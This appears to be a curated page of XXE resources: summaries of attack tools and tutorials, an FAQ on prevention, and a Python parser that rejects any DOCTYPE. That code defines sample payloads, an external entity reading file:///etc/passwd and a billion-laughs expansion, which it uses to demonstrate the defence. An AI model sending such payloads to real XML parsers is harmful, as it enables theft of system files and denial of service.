2023-08-19 | XXExploiter [intermediate] | Tool for generating XML payloads and serving DTDs for XML External Entity (XXE) injection attacks. XXExploiter supports various modes including XML, Out-of-Band (OOB), and CDATA extraction, with options for command execution via PHP's expect, data exfiltration, and fuzzing specific parameters using wordlists. It can automatically start a server for OOB data transfer and also acts as a client to send XML files and retrieve responses.
2022-08-10 | How to Protect Text Input from XML External Entity (XXE) Attacks using Pyth [intermediate, Python] | The content discusses protecting text input from XML External Entity (XXE) attacks using Python. XXE attacks aim to disrupt an application's handling of serialized data. Implementing countermeasures in Python can help prevent these attacks and ensure the security of the application.
2021-05-18 | If you find powerful OXML XXE tool? it’s “DOCEM” [intermediate, Bug Bounty] | The content shares a tool called "DOCEM" for XXE testing, which is considered more convenient than other existing tools. It aims to assist in finding a powerful OXML XXE tool, offering a more user-friendly experience compared to manual methods or previously available tools.
2021-05-04 | XXE : From Zero to Hero [beginner] | This content, "XXE: From Zero to Hero," likely explores XML External Entity (XXE) vulnerabilities, guiding readers from a foundational understanding of XXE to mastering its exploitation and defense. It probably covers how XXE flaws arise from improper XML parsing, their potential impacts (such as data exfiltration or denial of service), and techniques for identifying and mitigating these vulnerabilities.
2021-01-20 | XXE attacks 😈 [beginner] | Various file formats such as PDF, Excel, SVG, and ebooks utilize XML and can be susceptible to XXE (XML External Entity) attacks. These attacks involve exploiting vulnerabilities in XML parsers to access sensitive data or execute malicious actions. It is crucial for developers and users to be aware of the risks associated with XXE attacks and implement proper security measures to prevent unauthorized access to data.
2020-01-27 | Exploiting The Entity: XXE (XML External Entity Injection) - Pentestmag [beginner] | The content discusses XXE (XML External Entity Injection) and its exploitation. XXE is a vulnerability that allows attackers to manipulate XML input to access sensitive data or execute remote code; by injecting malicious entities into XML documents, attackers can exploit vulnerable applications. Understanding XXE is crucial for penetration testing and for securing systems against such attacks. The article likely covers the technical details of XXE exploitation, its impact on security, and strategies to prevent it.
2018-09-13 | XXE - Things Are Getting Out of Band [intermediate] | Technique detailing out-of-band XXE attacks, leveraging FTP and HTTP handlers for blind exfiltration of sensitive data like `/etc/passwd`. The technique applies to vulnerable Java versions (<1.7 and sometimes >1.7) and can extend to ASP.NET applications for potential RCE via web shell downloads. → blog.zsec.uk
2017-02-07 | Advice From A Researcher: Hunting XXE For Fun and Profit [intermediate] | The content, "Advice From A Researcher: Hunting XXE For Fun and Profit," likely offers a researcher's insights and tips on finding and exploiting XML External Entity (XXE) vulnerabilities, both for enjoyment and for bug bounty income. The focus is on the process of identifying XXE vulnerabilities in systems and on how to hunt for them effectively.
2017-01-31 | BuffaloWill/oxml_xxe: A tool for embedding XXE/XML exploits into different [intermediate] | Tool for embedding XXE/XML exploits into various OXML document file formats including DOCX, XLSX, PPTX, ODT, ODG, ODP, ODS, and SVG. Developed in Ruby using Sinatra, Bootstrap, and Slim, this application facilitates testing XXE vulnerabilities in file upload functionalities, referencing techniques discussed in the BH USA 2015 presentation.

Frequently Asked Questions

What is an XXE attack?
An XML External Entity attack exploits XML parsers that process external entity references. By defining a malicious entity (e.g., referencing file:///etc/passwd), an attacker can read local files, perform SSRF, or cause denial of service through entity expansion (billion laughs attack).
Where do XXE vulnerabilities appear besides XML APIs?
XXE can appear in file uploads (DOCX, XLSX, SVG, and PDF files are XML-based), SAML authentication flows, RSS/Atom feed parsers, SOAP web services, and any application that processes XML configuration files — even if it does not explicitly accept XML input.
How do you prevent XXE?
Disable external entity resolution and DTD processing in your XML parser. The exact configuration varies by language: in Java, set disallow-doctype-decl; in Python, use defusedxml; in PHP, use libxml_disable_entity_loader. Where possible, use simpler data formats like JSON instead of XML.
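A stdlib-only Python version of the first recommendation above, added here as an example rather than code from any listed resource: it rejects the DOCTYPE at parse time, so no entity (external, parameter, or billion-laughs) can ever be declared. Function names and the sample documents are constructed for the demo.

```python
import xml.parsers.expat as expat

class XXEBlocked(Exception):
    """Raised when untrusted XML declares a DTD or references an external entity."""

def parse_untrusted_xml(data: bytes) -> dict:
    """Return {element: text} for text-bearing elements; any DOCTYPE aborts parsing,
    which removes the DTD that external entities, parameter entities and
    billion-laughs expansion all depend on (cf. Java's 'disallow-doctype-decl')."""
    parser = expat.ParserCreate()
    result, stack = {}, []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XXEBlocked(f"DOCTYPE {name!r} rejected (system id {sysid!r})")

    def on_external_entity(context, base, sysid, pubid):
        return 0  # defence in depth: 0 makes expat abort on any external reference

    def on_chars(text):
        if stack:
            stack[-1][1] += text

    def on_end(name):
        el_name, text = stack.pop()
        if text.strip():
            result[el_name] = text.strip()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = lambda name, attrs: stack.append([name, ""])
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(data, True)
    return result

def is_safe(data: bytes) -> bool:
    """True when the document parses without tripping the DTD guard."""
    try:
        parse_untrusted_xml(data)
        return True
    except XXEBlocked:
        return False

# Constructed sample inputs: a benign order, the classic external-entity shape
# from the FAQ above, and a billion-laughs shape (both need a DTD to work).
BENIGN = b"<order><item>widget</item><qty>2</qty></order>"
XXE = b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
LAUGHS = b'<!DOCTYPE lolz [<!ENTITY lol "lol"><!ENTITY lol2 "&lol;&lol;">]><lolz>&lol2;</lolz>'
```

Because the guard fires on the DOCTYPE itself, the parser never reaches the entity declaration, so the same check also stops attacks that hide the payload in an external DTD.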
